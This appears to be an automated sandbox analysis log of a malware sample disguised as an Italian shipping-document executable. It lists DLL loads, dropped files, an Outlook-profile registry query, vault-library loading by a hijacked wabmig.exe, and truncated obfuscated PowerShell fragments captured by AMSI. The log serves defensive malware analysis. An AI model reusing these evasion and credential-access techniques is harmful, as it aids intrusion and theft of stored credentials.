            Source: C:\Users\user\Desktop\Documenti di spedizione 0009333000459595995.exeSection loaded: wintypes.dllJump to behavior
            Source: C:\Users\user\Desktop\Documenti di spedizione 0009333000459595995.exeSection loaded: wintypes.dllJump to behavior
            Source: C:\Users\user\Desktop\Documenti di spedizione 0009333000459595995.exeSection loaded: textshaping.dllJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: atl.dllJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: mscoree.dllJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: kernel.appcore.dllJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: version.dllJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: vcruntime140_clr0400.dllJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: ucrtbase_clr0400.dllJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: ucrtbase_clr0400.dllJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: cryptsp.dllJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: rsaenh.dllJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: cryptbase.dllJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: amsi.dllJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: windows.storage.dllJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: wldp.dllJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: userenv.dllJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: profapi.dllJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: msasn1.dllJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: gpapi.dllJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: msisip.dllJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: wshext.dllJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: appxsip.dllJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: opcservices.dllJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: secur32.dllJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: sspicli.dllJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: uxtheme.dllJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: wbemcomn.dllJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: napinsp.dllJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: pnrpnsp.dllJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: wshbth.dllJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: nlaapi.dllJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: iphlpapi.dllJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: mswsock.dllJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: dnsapi.dllJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: winrnr.dllJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: fwpuclnt.dllJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: rasadhlp.dllJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: ntmarta.dllJump to behavior
            Source: C:\Program Files (x86)\Windows Mail\wabmig.exeSection loaded: wininet.dllJump to behavior
            Source: C:\Program Files (x86)\Windows Mail\wabmig.exeSection loaded: iertutil.dllJump to behavior
            Source: C:\Program Files (x86)\Windows Mail\wabmig.exeSection loaded: sspicli.dllJump to behavior
            Source: C:\Program Files (x86)\Windows Mail\wabmig.exeSection loaded: windows.storage.dllJump to behavior
            Source: C:\Program Files (x86)\Windows Mail\wabmig.exeSection loaded: wldp.dllJump to behavior
            Source: C:\Program Files (x86)\Windows Mail\wabmig.exeSection loaded: profapi.dllJump to behavior
            Source: C:\Program Files (x86)\Windows Mail\wabmig.exeSection loaded: kernel.appcore.dllJump to behavior
            Source: C:\Program Files (x86)\Windows Mail\wabmig.exeSection loaded: ondemandconnroutehelper.dllJump to behavior
            Source: C:\Program Files (x86)\Windows Mail\wabmig.exeSection loaded: winhttp.dllJump to behavior
            Source: C:\Program Files (x86)\Windows Mail\wabmig.exeSection loaded: mswsock.dllJump to behavior
            Source: C:\Program Files (x86)\Windows Mail\wabmig.exeSection loaded: iphlpapi.dllJump to behavior
            Source: C:\Program Files (x86)\Windows Mail\wabmig.exeSection loaded: winnsi.dllJump to behavior
            Source: C:\Program Files (x86)\Windows Mail\wabmig.exeSection loaded: urlmon.dllJump to behavior
            Source: C:\Program Files (x86)\Windows Mail\wabmig.exeSection loaded: srvcli.dllJump to behavior
            Source: C:\Program Files (x86)\Windows Mail\wabmig.exeSection loaded: netutils.dllJump to behavior
            Source: C:\Program Files (x86)\Windows Mail\wabmig.exeSection loaded: mscoree.dllJump to behavior
            Source: C:\Program Files (x86)\Windows Mail\wabmig.exeSection loaded: version.dllJump to behavior
            Source: C:\Program Files (x86)\Windows Mail\wabmig.exeSection loaded: vcruntime140_clr0400.dllJump to behavior
            Source: C:\Program Files (x86)\Windows Mail\wabmig.exeSection loaded: ucrtbase_clr0400.dllJump to behavior
            Source: C:\Program Files (x86)\Windows Mail\wabmig.exeSection loaded: uxtheme.dllJump to behavior
            Source: C:\Program Files (x86)\Windows Mail\wabmig.exeSection loaded: cryptsp.dllJump to behavior
            Source: C:\Program Files (x86)\Windows Mail\wabmig.exeSection loaded: rsaenh.dllJump to behavior
            Source: C:\Program Files (x86)\Windows Mail\wabmig.exeSection loaded: cryptbase.dllJump to behavior
            Source: C:\Program Files (x86)\Windows Mail\wabmig.exeSection loaded: wbemcomn.dllJump to behavior
            Source: C:\Program Files (x86)\Windows Mail\wabmig.exeSection loaded: amsi.dllJump to behavior
            Source: C:\Program Files (x86)\Windows Mail\wabmig.exeSection loaded: userenv.dllJump to behavior
            Source: C:\Program Files (x86)\Windows Mail\wabmig.exeSection loaded: rasapi32.dllJump to behavior
            Source: C:\Program Files (x86)\Windows Mail\wabmig.exeSection loaded: rasman.dllJump to behavior
            Source: C:\Program Files (x86)\Windows Mail\wabmig.exeSection loaded: rtutils.dllJump to behavior
            Source: C:\Program Files (x86)\Windows Mail\wabmig.exeSection loaded: dhcpcsvc6.dllJump to behavior
            Source: C:\Program Files (x86)\Windows Mail\wabmig.exeSection loaded: dhcpcsvc.dllJump to behavior
            Source: C:\Program Files (x86)\Windows Mail\wabmig.exeSection loaded: dnsapi.dllJump to behavior
            Source: C:\Program Files (x86)\Windows Mail\wabmig.exeSection loaded: rasadhlp.dllJump to behavior
            Source: C:\Program Files (x86)\Windows Mail\wabmig.exeSection loaded: fwpuclnt.dllJump to behavior
            Source: C:\Program Files (x86)\Windows Mail\wabmig.exeSection loaded: secur32.dllJump to behavior
            Source: C:\Program Files (x86)\Windows Mail\wabmig.exeSection loaded: schannel.dllJump to behavior
            Source: C:\Program Files (x86)\Windows Mail\wabmig.exeSection loaded: mskeyprotect.dllJump to behavior
            Source: C:\Program Files (x86)\Windows Mail\wabmig.exeSection loaded: ntasn1.dllJump to behavior
            Source: C:\Program Files (x86)\Windows Mail\wabmig.exeSection loaded: ncrypt.dllJump to behavior
            Source: C:\Program Files (x86)\Windows Mail\wabmig.exeSection loaded: ncryptsslp.dllJump to behavior
            Source: C:\Program Files (x86)\Windows Mail\wabmig.exeSection loaded: msasn1.dllJump to behavior
            Source: C:\Program Files (x86)\Windows Mail\wabmig.exeSection loaded: gpapi.dllJump to behavior
            Source: C:\Program Files (x86)\Windows Mail\wabmig.exeSection loaded: vaultcli.dllJump to behavior
            Source: C:\Program Files (x86)\Windows Mail\wabmig.exeSection loaded: wintypes.dllJump to behavior
            Source: C:\Users\user\Desktop\Documenti di spedizione 0009333000459595995.exeKey value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{1f486a52-3cb1-48fd-8f50-b8dc300d9f9d}\InProcServer32Jump to behavior
            Source: Window RecorderWindow detected: More than 3 window changes detected
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorrc.dllJump to behavior
            Source: C:\Program Files (x86)\Windows Mail\wabmig.exeKey opened: HKEY_CURRENT_USER\Software\Microsoft\Office\11.0\Outlook\ProfilesJump to behavior
            Source: Documenti di spedizione 0009333000459595995.exeStatic PE information: DYNAMIC_BASE, NX_COMPAT, NO_SEH, TERMINAL_SERVER_AWARE
            Source: Binary string: jqm.Core.pdb source: powershell.exe, 00000001.00000002.2389766114.00000000070C4000.00000004.00000020.00020000.00000000.sdmp
            Source: Binary string: System.Core.pdb source: powershell.exe, 00000001.00000002.2389766114.00000000070C4000.00000004.00000020.00020000.00000000.sdmp
            Source: Binary string: \??\C:\Windows\dll\System.Management.Automation.pdbPCp source: powershell.exe, 00000001.00000002.2393965982.00000000081B8000.00000004.00000020.00020000.00000000.sdmp
            Source: Binary string: \??\C:\Windows\dll\System.Management.Automation.pdbLC source: powershell.exe, 00000001.00000002.2393965982.00000000081B8000.00000004.00000020.00020000.00000000.sdmp
            Source: Binary string: CallSite.Targetore.pdb source: powershell.exe, 00000001.00000002.2389766114.00000000070C4000.00000004.00000020.00020000.00000000.sdmp

            Data Obfuscation

            barindex
            Source: Yara matchFile source: 00000001.00000002.2394657139.0000000008C11000.00000040.00001000.00020000.00000000.sdmp, type: MEMORY
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeAnti Malware Scan Interface: GetDelegateForFunctionPointer((Carboxylase $Libyerne $Prisere), (Harminic @([IntPtr], [UInt32], [UInt32], [UInt32]) ([IntPtr])))$global:Xerotherm = [AppDomain]::CurrentDomain.GetAssemblies()$global:Ch
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeAnti Malware Scan Interface: DefineDynamicAssembly((New-Object System.Reflection.AssemblyName($efterkrigsaarene)), $hjernekiste).DefineDynamicModule($Sexsymboler, $false).DefineType($Chorale, $Trosbekendelserne, [System.Multicast
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeCode function: 1_2_00C1E244 pushfd ; iretd 1_2_00C1E24D
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeCode function: 1_2_00C1CB88 push C807F088h; ret 1_2_00C1CB8D
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeCode function: 1_2_0712E174 push 84E80835h; iretd 1_2_0712E179
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeCode function: 1_2_0712EDA8 push edx; ret 1_2_0712EDAB
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeCode function: 1_2_0712AB0B push dword ptr [ebp+ebx-75h]; iretd 1_2_0712AB11
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeCode function: 1_2_08B22680 push 00000071h; retf 1_2_08B22684
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeCode function: 1_2_08B22272 push edi; retf 1_2_08B22273
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeCode function: 1_2_08B21055 push esi; ret 1_2_08B2105A
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeCode function: 1_2_08B20846 pushad ; iretd 1_2_08B2084D
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeCode function: 1_2_08B23045 push ecx; ret 1_2_08B23046
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeCode function: 1_2_08B24596 push ds; iretd 1_2_08B24598
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeCode function: 1_2_08B22F80 push ebx; ret 1_2_08B22F8E
            Source: C:\Program Files (x86)\Windows Mail\wabmig.exeCode function: 6_2_03C62F80 push ebx; ret 6_2_03C62F8E
            Source: C:\Program Files (x86)\Windows Mail\wabmig.exeCode function: 6_2_03C64596 push ds; iretd 6_2_03C64598
            Source: C:\Program Files (x86)\Windows Mail\wabmig.exeCode function: 6_2_03C62680 push 00000071h; retf 6_2_03C62684
            Source: C:\Program Files (x86)\Windows Mail\wabmig.exeCode function: 6_2_03C60846 pushad ; iretd 6_2_03C6084D
            Source: C:\Program Files (x86)\Windows Mail\wabmig.exeCode function: 6_2_03C63045 push ecx; ret 6_2_03C63046
            Source: C:\Program Files (x86)\Windows Mail\wabmig.exeCode function: 6_2_03C61055 push esi; ret 6_2_03C6105A
            Source: C:\Program Files (x86)\Windows Mail\wabmig.exeCode function: 6_2_03C62272 push edi; retf 6_2_03C62273
            Source: C:\Program Files (x86)\Windows Mail\wabmig.exeCode function: 6_2_26933FC8 push 2426A3DAh; retf 6_2_26933FD5
            Source: C:\Users\user\Desktop\Documenti di spedizione 0009333000459595995.exeFile created: C:\Users\user\AppData\Local\Temp\nsaE9D3.tmp\nsExec.dllJump to dropped file
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeFile created: C:\Users\user\AppData\Local\acneform\Documenti di spedizione 0009333000459595995.exeJump to dropped file
            Source: C:\Users\user\Desktop\Documenti di spedizione 0009333000459595995.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\Desktop\Documenti di spedizione 0009333000459595995.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\conhost.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Program Files (x86)\Windows Mail\wabmig.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Program Files (x86)\Windows Mail\wabmig.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Program Files (x86)\Windows Mail\wabmig.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Program Files (x86)\Windows Mail\wabmig.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Program Files (x86)\Windows Mail\wabmig.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Program Files (x86)\Windows Mail\wabmig.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Program Files (x86)\Windows Mail\wabmig.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Program Files (x86)\Windows Mail\wabmig.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Program Files (x86)\Windows Mail\wabmig.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Program Files (x86)\Windows Mail\wabmig.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Program Files (x86)\Windows Mail\wabmig.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Program Files (x86)\Windows Mail\wabmig.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Program Files (x86)\Windows Mail\wabmig.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Program Files (x86)\Windows Mail\wabmig.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Program Files (x86)\Windows Mail\wabmig.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Program Files (x86)\Windows Mail\wabmig.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Program Files (x86)\Windows Mail\wabmig.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Program Files (x86)\Windows Mail\wabmig.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Program Files (x86)\Windows Mail\wabmig.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Program Files (x86)\Windows Mail\wabmig.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Program Files (x86)\Windows Mail\wabmig.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Program Files (x86)\Windows Mail\wabmig.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Program Files (x86)\Windows Mail\wabmig.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Program Files (x86)\Windows Mail\wabmig.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Program Files (x86)\Windows Mail\wabmig.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Program Files (x86)\Windows Mail\wabmig.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Program Files (x86)\Windows Mail\wabmig.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Program Files (x86)\Windows Mail\wabmig.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Program Files (x86)\Windows Mail\wabmig.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Program Files (x86)\Windows Mail\wabmig.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Program Files (x86)\Windows Mail\wabmig.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Program Files (x86)\Windows Mail\wabmig.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Program Files (x86)\Windows Mail\wabmig.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Program Files (x86)\Windows Mail\wabmig.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Program Files (x86)\Windows Mail\wabmig.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Program Files (x86)\Windows Mail\wabmig.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Program Files (x86)\Windows Mail\wabmig.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Program Files (x86)\Windows Mail\wabmig.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Program Files (x86)\Windows Mail\wabmig.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Program Files (x86)\Windows Mail\wabmig.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Program Files (x86)\Windows Mail\wabmig.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Program Files (x86)\Windows Mail\wabmig.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Program Files (x86)\Windows Mail\wabmig.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
